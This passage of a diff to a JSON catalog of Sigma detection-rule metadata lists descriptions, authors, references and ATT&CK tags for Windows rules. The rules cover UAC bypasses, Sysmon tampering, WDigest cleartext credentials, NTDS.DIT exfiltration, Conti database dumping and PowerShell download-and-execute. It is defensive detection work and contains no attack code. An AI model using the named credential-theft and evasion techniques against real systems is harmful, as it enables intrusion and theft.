"registry_set_terminal_server_tampering.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html", - "http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/", - "https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03", - "https://threathunterplaybook.com/notebooks/windows/05_defense_evasion/WIN-190407183310.html", - "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/", - "http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/", - "https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_terminal_server_tampering.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1112" - ] - }, - "uuid": "3f6b7b62-61aa-45db-96bd-9c31b36b653c", - "value": "RDP Sensitive Settings Changed" - }, - { - "description": "Detects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\TimeProvider.\nAdversaries may abuse time providers to execute DLLs when the system boots.\nThe Windows Time service (W32Time) enables time synchronization across and within domains.\n", - "meta": { - "author": "frack113", - "creation_date": "2022/06/19", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_timeproviders_dllname.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.003/T1547.003.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_timeproviders_dllname.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1547.003" - ] - }, - "uuid": "e88a6ddc-74f7-463b-9b26-f69fc0d2ce85", - "value": "Set TimeProviders DllName" - }, - { - "description": "Detect modification of TreatAs key to enable \"rundll32.exe -sta\" command", - "meta": { - "author": "frack113", - "creation_date": "2022/08/28", - "falsepositive": [ - "Legitimate use" - ], - "filename": "registry_set_treatas_persistence.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1546.015/T1546.015.md", - "https://www.youtube.com/watch?v=3gz1QmiMhss&t=1251s", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_treatas_persistence.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1546.015" - ] - }, - "uuid": "dc5c24af-6995-49b2-86eb-a9ff62199e82", - "value": "COM Hijacking via TreatAs" - }, - { - "description": "Detects UAC bypass method using Windows event viewer", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/03/19", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_uac_bypass_eventvwr.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/", - "https://www.hybrid-analysis.com/sample/e122bc8bf291f15cab182a5d2d27b8db1e7019e4e96bb5cdbd1dfe7446f3f51f?environmentId=100", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_uac_bypass_eventvwr.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "car.2019-04-001" - ] - }, - "uuid": "7c81fec3-1c1d-43b0-996a-46753041b1b6", - "value": "UAC Bypass via Event Viewer - Registry Set" - }, - { - "description": "Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. UACMe 53)", - "meta": { - "author": "Omer Yampel, Christian Burkard", - "creation_date": "2017/03/17", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_uac_bypass_sdclt.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/", - "https://github.com/hfiref0x/UACME", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_uac_bypass_sdclt.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "car.2019-04-001" - ] - }, - "uuid": "5b872a46-3b90-45c1-8419-f675db8053aa", - "value": "UAC Bypass via Sdclt" - }, - { - "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", - "meta": { - "author": "Christian Burkard", - "creation_date": "2021/08/30", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_uac_bypass_winsat.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/hfiref0x/UACME", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_uac_bypass_winsat.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ] - }, - "uuid": "6597be7b-ac61-4ac8-bef4-d3ec88174853", - "value": "UAC Bypass Abusing Winsat Path Parsing - Registry" - }, - { - "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", - "meta": { - "author": "Christian Burkard", - "creation_date": "2021/08/23", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_uac_bypass_wmp.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/hfiref0x/UACME", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_uac_bypass_wmp.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ] - }, - "uuid": "5f9db380-ea57-4d1e-beab-8a2d33397e93", - "value": "UAC Bypass Using Windows Media Player - Registry" - }, - { - "description": "Detects VBScript content stored into registry keys as seen being used by UNC2452 group", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/03/05", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_vbs_payload_stored.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_vbs_payload_stored.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ] - }, - "uuid": "46490193-1b22-4c29-bdd6-5bf63907216f", - "value": "VBScript Payload Stored in Registry" - }, - { - "description": "This rule detects that the path to the DLL written in the registry is different from the default one. Launched WAB.exe tries to load the DLL from Registry.", - "meta": { - "author": "oscd.community, Natalia Shornikova", - "creation_date": "2020/10/13", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_wab_dllpath_reg_change.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/LOLBAS-Project/LOLBAS/blob/8283d8d91552213ded165fd36deb6cb9534cb443/yml/OSBinaries/Wab.yml", - "https://twitter.com/Hexacorn/status/991447379864932352", - "http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_wab_dllpath_reg_change.yml" + "https://lolbas-project.github.io/lolbas/Binaries/Unregmp2/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_unregmp2.yml" ], "tags": [ "attack.defense_evasion", "attack.t1218" ] }, - "uuid": "fc014922-5def-4da9-a0fc-28c973f41bfb", - "value": "Execution DLL of Choice Using WAB.EXE" + "uuid": "727454c0-d851-48b0-8b89-385611ab0704", + "value": "Lolbin Unregmp2.exe Use As Proxy" }, { - "description": "Detects potential malicious modification of the property value of UseLogonCredential from HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to enable clear-text credentials", + "description": "Detects suspicious process patterns used in NTDS.DIT exfiltration", "meta": { - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "creation_date": "2019/09/12", + "author": "Florian Roth", + "creation_date": "2022/03/11", "falsepositive": [ "Unknown" ], - "filename": "registry_set_wdigest_enable_uselogoncredential.yml", + "filename": "proc_creation_win_susp_ntds.yml", "level": "high", - "logsource.category": "registry_set", + "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190511223310.html", - "https://support.microsoft.com/en-us/topic/microsoft-security-advisory-update-to-improve-credentials-protection-and-management-may-13-2014-93434251-04ac-b7f3-52aa-9f951c14b649", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_wdigest_enable_uselogoncredential.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ] - }, - "uuid": "d6a9b252-c666-4de6-8806-5561bbbd3bdc", - "value": "Wdigest Enable UseLogonCredential" - }, - { - "description": "Detects when attackers or tools disable Windows Defender functionalities via the windows registry", - "meta": { - "author": "AlertIQ, Ján Trenčanský, frack113, Nasreddine Bencherchali", - "creation_date": "2022/08/01", - "falsepositive": [ - "Administrator actions" - ], - "filename": "registry_set_windows_defender_tamper.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", - "https://gist.github.com/anadr/7465a9fde63d41341136949f14c21105", - "https://admx.help/?Category=Windows_7_2008R2&Policy=Microsoft.Policies.WindowsDefender::SpyNetReporting", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_windows_defender_tamper.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "0eb46774-f1ab-4a74-8238-1155855f2263", - "value": "Disable Windows Defender Functionalities Via Registry Keys" - }, - { - "description": "Detects when the 'AllowMultipleTSSessions' value is enabled.\nWhich allows for multiple Remote Desktop connection sessions to be opened at once.\nThis is often used by attacker as a way to connect to an RDP session without disconnecting the other users\n", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/09/09", - "falsepositive": [ - "Legitmate use of the multi session functionality" - ], - "filename": "registry_set_winlogon_allow_multiple_tssessions.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_winlogon_allow_multiple_tssessions.yml" - ], - "tags": [ - "attack.persistence" - ] - }, - "uuid": "f7997770-92c3-4ec9-b112-774c4ef96f96", - "value": "Winlogon AllowMultipleTSSessions Enable" - }, - { - "description": "Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in.\nWinlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.\n", - "meta": { - "author": "frack113", - "creation_date": "2021/12/30", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_winlogon_notify_key.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.004/T1547.004.md#atomic-test-3---winlogon-notify-key-logon-persistence---powershell", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_winlogon_notify_key.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.004" - ] - }, - "uuid": "bbf59793-6efb-4fa1-95ca-a7d288e52c88", - "value": "Winlogon Notify Key Logon Persistence" - }, - { - "description": "Detects when an attacker adds a new \"DLLPathOverride\" value to the \"Natural Language\" key in order to achieve persistence which will get invoked by \"SearchIndexer.exe\" process", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/21", - "falsepositive": [ - "Unknown" - ], - "filename": "regsitry_set_natural_language_persistence.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://persistence-info.github.io/Data/naturallanguage6.html", - "https://www.hexacorn.com/blog/2018/12/30/beyond-good-ol-run-key-part-98/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/regsitry_set_natural_language_persistence.yml" - ], - "tags": [ - "attack.persistence" - ] - }, - "uuid": "a1b1fd53-9c4a-444c-bae0-34a330fc7aa8", - "value": "Add DLLPathOverride Entry For Persistence" - }, - { - "description": "Detects Accessing to lsass.exe by Powershell", - "meta": { - "author": "oscd.community, Natalia Shornikova", - "creation_date": "2020/10/06", - "falsepositive": [ - "Unknown" - ], - "filename": "sysmon_accessing_winapi_in_powershell_credentials_dumping.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml" + "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration", + "https://github.com/rapid7/metasploit-framework/blob/d297adcebb5c1df6fe30b12ca79b161deb71571c/data/post/powershell/NTDSgrab.ps1", + "https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/", + "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1", + "https://github.com/zcgonvh/NTDSDumpEx", + "https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1", + "https://pentestlab.blog/tag/ntds-dit/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntds.yml" ], "tags": [ "attack.credential_access", - "attack.t1003.001" + "attack.t1003.003" ] }, - "uuid": "3f07b9d1-2082-4c56-9277-613a621983cc", - "value": "Accessing WinAPI in PowerShell for Credentials Dumping" + "uuid": "8bc64091-6875-4881-aaf9-7bd25b5dda08", + "value": "Suspicious Process Patterns NTDS.DIT Exfil" }, { - "description": "Detects a Sysmon configuration change, which could be the result of a legitimate reconfiguration or someone trying manipulate the configuration", + "description": "Detects a command used by conti to dump database", "meta": { "author": "frack113", - "creation_date": "2022/01/12", - "falsepositive": [ - "Legitimate administrative action" - ], - "filename": "sysmon_config_modification.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_config_modification.yml" - ], - "tags": [ - "attack.defense_evasion" - ] - }, - "uuid": "8ac03a65-6c84-4116-acad-dc1558ff7a77", - "value": "Sysmon Configuration Change" - }, - { - "description": "Detects when an adversary is trying to hide it's action from Sysmon logging based on error messages", - "meta": { - "author": "frack113", - "creation_date": "2021/06/04", - "falsepositive": [ - "Legitimate administrative action" - ], - "filename": "sysmon_config_modification_error.yml", - "level": "high", - "logsource.category": "sysmon_error", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", - "https://talesfrominfosec.blogspot.com/2017/12/killing-sysmon-silently.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_config_modification_error.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564" - ] - }, - "uuid": "815cd91b-7dbc-4247-841a-d7dd1392b0a8", - "value": "Sysmon Configuration Error" - }, - { - "description": "Detects when an attacker tries to hide from Sysmon by disabling or stopping it", - "meta": { - "author": "frack113", - "creation_date": "2021/06/04", - "falsepositive": [ - "Legitimate administrative action" - ], - "filename": "sysmon_config_modification_status.yml", - "level": "high", - "logsource.category": "sysmon_status", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", - "https://talesfrominfosec.blogspot.com/2017/12/killing-sysmon-silently.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_config_modification_status.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564" - ] - }, - "uuid": "1f2b5353-573f-4880-8e33-7d04dcf97744", - "value": "Sysmon Configuration Modification" - }, - { - "description": "Detects a threat actor creating a file named `iertutil.dll` in the `C:\\Program Files\\Internet Explorer\\` directory over the network and loading it for a DCOM InternetExplorer DLL Hijack scenario.", - "meta": { - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga", - "creation_date": "2020/10/12", + "creation_date": "2021/08/16", "falsepositive": [ "Unknown" ], - "filename": "sysmon_dcom_iertutil_dll_hijack.yml", - "level": "critical", - "logsource.category": "No established category", + "filename": "proc_creation_win_conti_sqlcmd.yml", + "level": "high", + "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://threathunterplaybook.com/notebooks/windows/08_lateral_movement/WIN-201009183000.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_dcom_iertutil_dll_hijack.yml" + "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", + "https://twitter.com/vxunderground/status/1423336151860002816?s=20", + "https://docs.microsoft.com/en-us/sql/tools/sqlcmd-utility?view=sql-server-ver15", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_conti_sqlcmd.yml" ], "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1021.003" + "attack.collection", + "attack.t1005" ] }, - "uuid": "e554f142-5cf3-4e55-ace9-a1b59e0def65", - "value": "DCOM InternetExplorer.Application Iertutil DLL Hijack - Sysmon" + "uuid": "2f47f1fd-0901-466e-a770-3b7092834a1b", + "value": "Conti Backup Database" }, { - "description": "Triggers on any Sysmon file block executable event. Which should indicates a violation of the block policy set", + "description": "Detects attackers using tooling with bad opsec defaults e.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run, one trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.", "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/16", + "author": "Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard", + "creation_date": "2020/10/23", "falsepositive": [ "Unlikely" ], - "filename": "sysmon_file_block_exe.yml", + "filename": "proc_creation_win_bad_opsec_sacrificial_processes.yml", "level": "high", - "logsource.category": "file_block", + "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://medium.com/@olafhartong/sysmon-14-0-fileblockexecutable-13d7ba3dff3e", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_file_block_exe.yml" - ], - "tags": [ - "attack.defense_evasion" - ] - }, - "uuid": "23b71bc5-953e-4971-be4c-c896cda73fc2", - "value": "Sysmon Blocked Executable" - }, - { - "description": "Detects when a memory process image does not match the disk image, indicative of process hollowing.", - "meta": { - "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Sittikorn S", - "creation_date": "2022/01/25", - "falsepositive": [ - "There are no known false positives at this time" - ], - "filename": "sysmon_process_hollowing.yml", - "level": "high", - "logsource.category": "process_tampering", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/SecurePeacock/status/1486054048390332423?s=20", - "https://www.bleepingcomputer.com/news/microsoft/microsoft-sysmon-now-detects-malware-process-tampering-attempts/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_process_hollowing.yml" + "https://docs.microsoft.com/en-us/dotnet/framework/tools/regsvcs-exe-net-services-installation-tool#feedback", + "https://blog.malwarebytes.com/malwarebytes-news/2020/10/kraken-attack-abuses-wer-service/", + "https://www.cobaltstrike.com/help-opsec", + "https://docs.microsoft.com/en-us/dotnet/framework/tools/regasm-exe-assembly-registration-tool", + "https://twitter.com/CyberRaiju/status/1251492025678983169", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regsvr32", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/rundll32", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bad_opsec_sacrificial_processes.yml" ], "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055.012" + "attack.t1218.011" ] }, - "uuid": "c4b890e5-8d8c-4496-8c66-c805753817cd", - "value": "Sysmon Process Hollowing Detection" + "uuid": "a7c3d773-caef-227e-a7e7-c2f13c622329", + "value": "Bad Opsec Defaults Sacrificial Processes With Improper Arguments" }, { - "description": "Detects creation of WMI event subscription persistence method", + "description": "Detects a suspicious DLL loading from AppData Local path as described in BlueMashroom report", "meta": { - "author": "Tom Ueltschi (@c_APT_ure)", - "creation_date": "2019/01/12", + "author": "Florian Roth, Tim Shelton", + "creation_date": "2019/10/02", "falsepositive": [ - "Exclude legitimate (vetted) use of WMI event subscription in your network" + "Unlikely" ], - "filename": "sysmon_wmi_event_subscription.yml", - "level": "medium", - "logsource.category": "wmi_event", + "filename": "proc_creation_win_apt_bluemashroom.yml", + "level": "critical", + "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/wmi_event/sysmon_wmi_event_subscription.yml" + "https://www.virusbulletin.com/conference/vb2019/abstracts/apt-cases-exploiting-vulnerabilities-region-specific-software", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_bluemashroom.yml" ], "tags": [ - "attack.persistence", - "attack.t1546.003" + "attack.defense_evasion", + "attack.t1218.010" ] }, - "uuid": "0f06a3a5-6a09-413f-8743-e6cf35561297", - "value": "WMI Event Subscription" + "uuid": "bd70d3f8-e60e-4d25-89f0-0b5a9cff20e0", + "value": "BlueMashroom DLL Load" }, { - "description": "Detects suspicious encoded payloads in WMI Event Consumers", + "description": "This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.", "meta": { "author": "Florian Roth", - "creation_date": "2021/09/01", + "creation_date": "2022/02/25", "falsepositive": [ "Unknown" ], - "filename": "sysmon_wmi_susp_encoded_scripts.yml", + "filename": "proc_creation_win_susp_crackmapexec_flags.yml", "level": "high", - "logsource.category": "wmi_event", + "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/RiccardoAncarani/LiquidSnake", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/wmi_event/sysmon_wmi_susp_encoded_scripts.yml" + "https://www.infosecmatter.com/crackmapexec-module-library/?cmem=mssql-mimikatz", + "https://www.infosecmatter.com/crackmapexec-module-library/?cmem=smb-pe_inject", + "https://mpgn.gitbook.io/crackmapexec/smb-protocol/authentication/checking-credentials-local", + "https://www.mandiant.com/resources/telegram-malware-iranian-espionage", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_crackmapexec_flags.yml" ], - "tags": [ - "attack.execution", - "attack.t1047", - "attack.persistence", - "attack.t1546.003" - ] + "tags": "No established tags" }, - "uuid": "83844185-1c5b-45bc-bcf3-b5bf3084ca5b", - "value": "Suspicious Encoded Scripts in a WMI Consumer" + "uuid": "42a993dd-bb3e-48c8-b372-4d6684c4106c", + "value": "CrackMapExec Command Line Flags" }, { - "description": "Detects suspicious commands that are related to scripting/powershell in WMI Event Consumers", + "description": "Use \">\" to redicrect information in commandline", "meta": { - "author": "Florian Roth, Jonhnathan Ribeiro", - "creation_date": "2019/04/15", + "author": "frack113", + "creation_date": "2022/01/22", "falsepositive": [ - "Legitimate administrative scripts" + "Internet Download Manager extensions use named pipes and redirection via CLI. Filter it out if you use it in your environment" ], - "filename": "sysmon_wmi_susp_scripting.yml", - "level": "high", - "logsource.category": "wmi_event", + "filename": "proc_creation_win_cmd_redirect.yml", + "level": "low", + "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://in.security/an-intro-into-abusing-and-identifying-wmi-event-subscriptions-for-persistence/", - "https://github.com/Neo23x0/signature-base/blob/615bf1f6bac3c1bdc417025c40c073e6c2771a76/yara/gen_susp_lnk_files.yar#L19", - "https://github.com/RiccardoAncarani/LiquidSnake", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/wmi_event/sysmon_wmi_susp_scripting.yml" + "https://ss64.com/nt/syntax-redirection.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_redirect.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1082" + ] + }, + "uuid": "4f4eaa9f-5ad4-410c-a4be-bc6132b0175a", + "value": "Redirect Output in CommandLine" + }, + { + "description": "Adversaries may abuse Visual Basic (VB) for execution", + "meta": { + "author": "frack113", + "creation_date": "2022/01/02", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_cscript_vbs.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.005/T1059.005.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cscript_vbs.yml" ], "tags": [ "attack.execution", "attack.t1059.005" ] }, - "uuid": "fe21810c-2a8c-478f-8dd3-5a287fb2a0e0", - "value": "Suspicious Scripting in a WMI Consumer" + "uuid": "23250293-eed5-4c39-b57a-841c8933a57d", + "value": "Cscript Visual Basic Script Execution" + }, + { + "description": "Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive)", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/02/28", + "falsepositive": [ + "Software installers that pull packages from remote systems and execute them" + ], + "filename": "proc_creation_win_powershell_download_patterns.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70", + "https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_download_patterns.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "e6c54d94-498c-4562-a37c-b469d8e9a275", + "value": "Suspicious PowerShell Download and Execute Pattern" + }, + { + "description": "Detects the execution of SecurityXploded Tools", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/12/19", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_hack_secutyxploded.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://securityxploded.com/", + "https://cyberx-labs.com/blog/gangnam-industrial-style-apt-campaign-targets-korean-industrial-companies/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_secutyxploded.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1555" + ] + }, + "uuid": "7679d464-4f74-45e2-9e01-ac66c5eb041a", + "value": "SecurityXploded Tool" + }, + { + "description": "Detects weak passwords or often abused passwords (seen used by threat actors) via the CLI. An example would be a threat actor creating a new user via the net command and providing the password inline", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/14", + "falsepositive": [ + "Legitimate usage of the passwords by users via commandline (should be discouraged)", + "Other currently unknown false positives" + ], + "filename": "proc_creation_win_weak_or_abused_passwords.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/", + "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_weak_or_abused_passwords.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution" + ] + }, + "uuid": "91edcfb1-2529-4ac2-9ecc-7617f895c7e4", + "value": "Weak or Abused Passwords In CLI" + }, + { + "description": "Detects the execution of the PoC that can be used to exploit Sysmon CVE-2022-41120", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/12/04", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_hack_sysmoneop.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/Wh04m1001/SysmonEoP", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_sysmoneop.yml" + ], + "tags": [ + "cve.2022.41120", + "attack.t1068", + "attack.privilege_escalation" + ] + }, + "uuid": "8a7e90c5-fe6e-45dc-889e-057fe4378bd9", + "value": "SysmonEOP Hack Tool" + }, + { + "description": "Detects python spawning a pretty tty", + "meta": { + "author": "Nextron Systems", + "creation_date": "2022/06/03", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_python_pty_spawn.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_python_pty_spawn.yml" + ], 